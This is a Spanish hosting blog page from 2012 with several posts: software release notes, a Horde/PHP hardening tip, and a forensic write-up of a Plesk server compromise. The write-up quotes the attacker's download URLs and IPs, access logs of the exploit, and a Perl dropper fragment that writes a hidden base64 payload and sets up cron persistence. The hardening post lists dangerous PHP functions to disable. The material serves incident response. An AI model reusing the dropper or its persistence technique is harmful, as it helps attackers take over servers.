¿ Tienes problemas con tu proveedor de servicio ? ¿ Estás contento con tu contratación ? Puede que tu experiencia ayude decidir una compra de un servicio, un gran proyecto…
Cuéntanos tus experiencias, publicaremos tus experiencias !!.
Escribe un email a info@hostingaldescubierto.com o contesta en este post.
Acaba de liberarse la nueva version de Prestashop 1.4.7.3 con las siguientes mejoras / modficiaciones:
#################################### # v1.4.7.3 - 14469 (2012-04-05) # #################################### Improved/changed features: [*] project : fix generation of settings file (constant _PS_CREATION_DATE_ was deleted) #PSCFI-4424 Fixed bugs: [-] Installer : Fixed #PSCFI-5089 [-] FO : BugFix : #PSCFI-4920 : escaping address field in template [-] FO : Fixed #PSCFI-5259 #PSCFI-3869 [-] FO : #PSCFI-5027 : Fixed a bug, when a user which didn't have addresses can pay by check his cart [-] FO : #PSCFI-5115 : Fixed a problem of fancybox when cover is not first image [-] FO : #PSCFI-5133 : Fixed a problem linked to ssl. Used Tools::usingSecureMode() for the treatment [-] BO : #PI-57 : Fix bug when we import pack of language in emails files [-] BO : #PSCFI-5012 : Fixed a problem of label in "blockcms.php" [-] BO : #PSCFI-5113 : fix bug when we deleting multiple products [-] Classes : Fixed #PSCFI-5234 - translations in modules are now correctly handled [-] MO : fixed bug #PNM-20, Add locale variable replacing the defaultLang one. [-] MO : Fixed bug #PNM-30. Order-confirmation and others pages could be tracked. [-] MO : Fixed bug #PSCFI-4912. SSL can be used for redirection. (Fix other blocking bug for the module) [-] MO : Fixed bug #PSFV-618. Properly redirect to the order-confirmation page to see properly the validation or error of the payement. [-] MO : #PNM-120 : Bug fix Ogone currency conversion (was applied twice) [-] MO : Refactoring, fix the display of a certificate depending of the selected lang, fix rating widget and verification of the trusted box data. [-] LO : Bug Fixed #PSCFI-4275 - SK Unit type
La descarga de la última versión en :
http://www.prestashop.com/download/releases/prestashop_1.4.7.3.zip
Seguramente esté muy documentado ya por ahí pero es muy recomendable dejar de usar horde bajo sendmail con el fin de securizar la máquina. Con el cambio que comentamos a continuación, evitamos tener que ejecutar comandos en la máquina local, ya que el correo lo enviamos vía smtp al servidor local o a cualquier otro servidor que configuremos.
Resumen rápido:
Deshabilitamos la mayor parte de funciones potencialmente peligrosas para el sistema.
Esto implica que fallen algunas aplicaciones, como Horde
# /etc/php5/apache2/php.ini) disable_functions = system,passthru,readfile,escapeshellarg,proc_close,proc_open,ini_alter,dl,show_source,curl_exec
La alternativa elegante sería activar safe_mode y dejar de usar sendmail, como vemos en el fragmento de la configuración de Horde:
# fragmento de la configuracion de horde
# /etc/psa-webmail/horde/horde/conf.p
if (ini_get("safe_mode") == "1") { // Safe mode in action
$conf['mailer']['params']['host'] = '127.0.0.1';
$conf['mailer']['params']['port'] = 25;
$conf['mailer']['params']['auth'] = false;
$conf['mailer']['type'] = 'smtp';
} else {
$conf['mailer']['params']['sendmail_path'] = '/usr/sbin/sendmail';
$conf['mailer']['params']['sendmail_args'] = '-oi';
$conf['mailer']['type'] = 'sendmail';
}
En Plesk10 se han definido plantillas para los servicios de forma que aunque cambiasemos los ficheros de configuarción de apache estos cambios se terminarían machacando y volveríamos al estado por defecto.
Para ello, Plesk ha provisto un repositorio de plantillas para configurar los servicios en /usr/local/psa/admin/conf/templates/
Para reconfigurar la plantilla tenemos aqui un copy&paste muy cómodo, como siempre nos gusta:
# reemplazar safe_mode en la plantilla sed -i 's/safe_mode off/safe_mode on/g' /usr/local/psa/admin/conf/templates/default/horde.php # reconfigurar las plantillas /usr/local/psa/admin/bin/httpdmng --reconfigure-server # recargar el servicio apache2ctl graceful
Para probarlo es necesario cerrar la sesión de Horde y volver a autenticarse.
Hace unas semanas se notificó por parte de Parallels un fallo crítico en el su software de panel de control de hosting: Plesk. Hicimos referencia a la nota en nuestro blog http://hostingaldescubierto.com/wordpress/2012/02/10/plesk-fallo-critico-de-seguridad-sql-injection/
Reciemiente hemos tenido accesos a una máquina usando este fallo de seguridad y vamos a compartir con vosotros algunas observaciones de estos accesos:
En el sistema se observan procesos perl no habituales, con lo que procedemos a buscar el origen del mismo con lsof y el resultado es que el origen del proceso pertenece a “/tmp/…” y se se ha eliminado. Ya esto nos da una idea de que el proceso no es para nada un proceso autorizado.
Verificamos /tmp y /var/tmp donde encontramos algunos ficheros ajenos al sistema pero sin contenido.
Si nos enganchamos al proceso , podemos ver que constantemente se está descargando ficheros de diversas urls con wget:
https://eycgkhkxfs.tmdnzapomk.info:1905//b/index.php?id=... https://94.23.208.20:1905//b/index.php?id https://rqckfdgumv.sxobnmbjzb.info:1905//b/index.php?...
Después de consultar algunas fuentes ( gracias Logan ) vemos que en los ficheros de logs de panel de control de plesk en /usr/local/psa/admin/logs/httpsd_access_log tenemos llamadas al fichero agent.php de la api de Plesk y posteriormente accesos al panel de control donde se suben ficheros a diversos dominios.
httpsd_access_log.processed.1.gz:78.139.244.50 dd.com:8443 - [13/Feb/2012:00:33:05 +0100] "POST /enterprise/control/agent.php HTTP/1.1" 200 74360 "-" "-" httpsd_access_log.processed.1.gz:78.139.244.50 dd.com:8443 - [13/Feb/2012:03:04:52 +0100] "POST /enterprise/control/agent.php HTTP/1.1" 200 74360 "-" "-" httpsd_access_log.processed.1.gz:78.139.244.50 dd.com:8443 - [13/Feb/2012:03:37:21 +0100] "POST /enterprise/control/agent.php HTTP/1.1" 200 74360 "-" "-"
110.136.186.229 x.x.x.x:8443 - [19/Feb/2012:05:12:37 +0100] "POST /login_up.php3 HTTP/1.1" 200 966 "https://x.x.x.x:8443/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; 3301; MyIE2)" 110.136.186.229 x.x.x.x:8443 - [19/Feb/2012:05:12:42 +0100] "GET /plesk/client@3/domain@/?context=domains HTTP/1.1" 200 29327 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; 3301; MyIE2)" 110.136.186.229 x.x.x.x:8443 - [19/Feb/2012:05:12:50 +0100] "GET /plesk/client@3/domain@222/hosting/file-manager/?cmd=chdir&file=%2Fcgi-bin%2F HTTP/1.1" 200 39293 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; 3301; MyIE2)" 110.136.186.229 x.x.x.x:8443 - [19/Feb/2012:05:13:06 +0100] "POST /plesk/client@3/domain@222/hosting/file-manager/create-file/ HTTP/1.1" 303 0 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; 3301; MyIE2)"
y dentro del dominio en la carpeta /cgi-bin/ vemos ficheros .cgi con el contenido de los scripts que el atacante ha subido.
Un fragmento de uno de los scripts nos indica que los procesos ejecutados en el sistema provienen de esos ficheros
open(OLD_UNIX, ">", "/tmp/.X11-unix");
print OLD_UNIX decode_base64("....L....");
close(OLD_UNIX);
system("echo '* * * * * perl /tmp/.X11-unix >/dev/null 2>&1' >
/tmp/cron.d ; crontab /tmp/cron.d ; rm /tmp/cron.d");
system("perl /tmp/.X11-unix");
print "exdone\n";
Como medidas para prevenir este fallo de seguridad hay que actualizar Plesk aplicando los microupdates.
Reviar /var/spool/cron aunque en nuestro caso no se han encontrado crontabs ajenos.
Es recomendable también ajustar los permisos para wget, curl y get
http://kb.parallels.com/en/113321
En breve daremos más detalles de las evidencias obtenidas.
Pues sí, la seguridad de Github ha sido comprometida hace unos días aquí teneis un enlace de Slashdot.
En este otro sitio teneis una entrada en el blog del propio github
Si teneis cuenta en github se recomienda encarecidamente que cambieis vuestras credenciales
Se ha notificado desde Parallels a todos los clientes de que existe un fallo grave de seguridad que permitie la inyección de código SQL que afecta a algunas versiones antiguas de Plesk . Las versiones afectadas son :
Se han publicado parches para solucionar estos problemas. Instalando los microupdates se corrije el problema, excepto en las versiones para Windows Plesk 9 y Windows Plesk 8 que se han publicado parches específicos en este enlace :
Para las versiones linux se puede ejecutar este comando para actuailzar la distribución:
/usr/local/psa/admin/sbin/autoinstaller --select-product-id plesk --select-release-current --reinstall-patch --install-component base
Y por último si queremos verificar la versión de nuestra instalación lo podemos comprobar así:
cat /usr/local/psa/version
No hace falta decir que es crítico actualizar el sistema.
Mañana 18 de Enero de 2012, cierro la web , junto con tantos otros miles de sitios para protestar contra las leyes SOPA y PIPA que próximamente votarán en Estados Unidos.
NO A LA CENSURA DE INTERNET
La verdad que no hemos hecho campaña de ningún tipo desde HostingAlDescubierto informando acerca de la #leysinde, SOPA , PIPA que actualmente están haciendo agitar medio mundo.
Mañana día 18 de Enero de 2012 miles o millones de sitios webs cerrarán durante unas horas para protestar contra las absurdas leyes que Estados Unidos que intentar censurar la red con el criterio que imponen las grandes compañías.
Es el momento de que todos luchemos por defender lo que queremos, en estos momentos en los que los sistemas políticos, financieros y sociales se tambalean.
http://sopastrike.com/
Vamos a ir subiendo algunos errores tipicos de jboss que aparecen en el log
WARN [org.jboss.resource.connectionmanager.JBossManagedConnectionPool] Throwable while attempting to get a new connection: null org.jboss.resource.JBossResourceException: Could not create connection; - nested throwable: (com.mysql.jdbc.CommunicationsException: Communications link failure due to underlying exception: ** BEGIN NESTED EXCEPTION ** java.net.SocketException MESSAGE: java.net.ConnectException: Connection refused STACKTRACE: java.net.SocketException: java.net.ConnectException: Connection refused
Este es facil, directamente no puede conectar con la base de datos Mysql usando el odbc, asi que hay que comprobar que la base de datos esta levantada, usuario , password, etc…
A partir de la pasada noche los Partners de Parallels ya tienen a su disposición la versión 10.4 del famoso panel de control de origen ruso. Estará a disposición del público en general a partir del 22 de Noviembre.
Descargas y documentacion :
Se ofrecen varios ‘webminars’ de formación con los nuevos cambios
Parallels anuncia su nueva release para el 18 de Noviembre. Seguramente ya es conocido por todos los lectores qué es Parallels Plesk Panels, para los que no, que sepais que Plesk es software de gestión de hosting que permite gestionar dominios, cuentas de correo, cuentas ftp, certificados, ssl e integrarlo con otras aplicaciones de Parallels. Aquí teneis más informacion http://www.parallels.com/products/plesk/
¿ qué tienes que hacer para probalarla ? fácil, puedes encontrarla aquí http://www.parallels.com/download/plesk10.4
Resumiendo las mejoras importantes:
* Configuración de php.ini por dominio
* Configuración de módulos de apache: activar y desactivar módulos
* Dedicar una ip de salida a un cliente para enviar correo
* Descargar ficheros de log vía ftp
* Buzones de correo no aceptan nuevos mails si han superado la quota de espacio
* Mejoras en el sistema de backup ( siempre ha sido un punto débil de Plesk menos en la versión 8 )
* Mejoras en las herramientas de migración ( otra herramienta delicada que no siempre funciona bien )
Esto es lo más destacable, pero para ver la lista completa podeis pasaros por estos enlaces :
* Parallels Plesk Panel 10.4 for Linux-based Operating Systems release notes
* Parallels Plesk Panel 10.4 for Windows-based Operating Systems release notes
© 2012 Hosting Al Descubierto · Proudly powered by WordPress & Green Park 2 by Cordobo.
Valid XHTML 1.0 Transitional | Valid CSS 3
